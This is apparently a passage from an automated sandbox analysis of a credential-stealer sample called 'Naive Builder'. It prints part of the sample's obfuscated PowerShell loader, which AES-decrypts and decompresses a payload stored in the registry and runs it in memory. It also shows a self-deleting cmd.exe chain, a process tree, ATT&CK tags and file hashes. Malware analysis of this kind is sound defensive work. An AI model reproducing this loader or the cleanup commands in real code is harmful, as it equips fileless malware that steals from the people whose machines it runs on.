-join '')($uQajJ1, 0, $uQajJ1.Length);$uQajJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ1);$uQajJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nHishQEgCf6Wrip0Vd5NBw==');$uQajJ2 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ2, 0, $uQajJ2.Length);$uQajJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ2);$uQajJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EHH0aLIupLRmFvkxYHYafA==');$uQajJ3 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ3, 0, $uQajJ3.Length);$uQajJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ3);$rwFhy.Dispose();$GbeQA1.Dispose();if (@(get-process -ea silentlycontinue $uQajJ3).count -gt 1) {exit};$cqpVt = [Microsoft.Win32.Registry]::$GZsVo.$Vsxgi($uQajJ).$iskZf($ZldVv);$eimmm=[string[]]$cqpVt.Split('\');$preJB=KdelZ(GwNqo([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[1])));XnBtD $preJB (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$UcUdn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[0]);$GbeQA = New-Object System.Security.Cryptography.AesManaged;$GbeQA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$Gzcae = $GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')();$UcUdn = $Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UcUdn, 0, $UcUdn.Length);$Gzcae.Dispose();$GbeQA.Dispose();$xreea = New-Object System.IO.MemoryStream(, $UcUdn);$tUOxo = New-Object System.IO.MemoryStream;$AlcuH = New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::$uQajJ1);$AlcuH.$VYaHm($tUOxo);$AlcuH.Dispose();$xreea.Dispose();$tUOxo.Dispose();$UcUdn = $tUOxo.ToArray();$HWqkc = $qPAwu | IEX;$UUjhO = $HWqkc::$uQajJ2($UcUdn);$EYBYD = $UUjhO.EntryPoint;$EYBYD.$uQajJ0($null, (, [string[]] ($QHSJO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"5⤵
- Views/modifies file attributes
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
2Hidden Files and Directories
1Hidden Window
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
290B
MD5c83dcb195cd4e9d4b5face3b1c8a6e99
SHA12d768755e522fa0dd49dd403042a6a932929f96f
SHA256042de26491a6f4a4fc07aca5ab9ba27b7cf73362bb6273051450d1fd3729b3aa
SHA512c7912819136e0940eb4594f4d18c4eafb66b276e7488fb0bb5a4f30697ea709a832228522324318cfb37343724689cc36eff2ce2f5d3ffe3f63613ac414c87a5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
1.8MB
MD57873612dddd9152d70d892427bc45ef0
SHA1ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083
-
Filesize
52KB
MD59ef28981adcbf4360de5f11b8f4ecff9
SHA1219aaa1a617b1dfa36f3928bd1020e410666134f
SHA2568caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c
-
Filesize
162KB
MD5a366d6623c14c377c682d6b5451575e6
SHA1a8894fcfb3aa06ad073b1f581b2e749b54827971
SHA2567ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6
SHA512cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
132KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
16KB
-
Filesize
16KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
160KB
-
Filesize
160KB
-
Filesize
760KB
-
Filesize
2.0MB
-
Filesize
160KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
712KB
-
Filesize
712KB
-
Filesize
7.7MB
-
Filesize
4.4MB
-
Filesize
2.0MB
-
Filesize
184KB
-
Filesize
2.0MB
-
Filesize
760KB
-
Filesize
240KB
-
Filesize
1.8MB
-
Filesize
2.0MB
-
Filesize
760KB
-
Filesize
320KB
-
Filesize
4.3MB
-
Filesize
2.0MB
-
Filesize
760KB
-
Filesize
2.6MB
-
Filesize
2.9MB
-
Filesize
16.6MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
352KB
-
Filesize
48KB
-
Filesize
2.0MB
-
Filesize
176KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
10.8MB
-
Filesize
8KB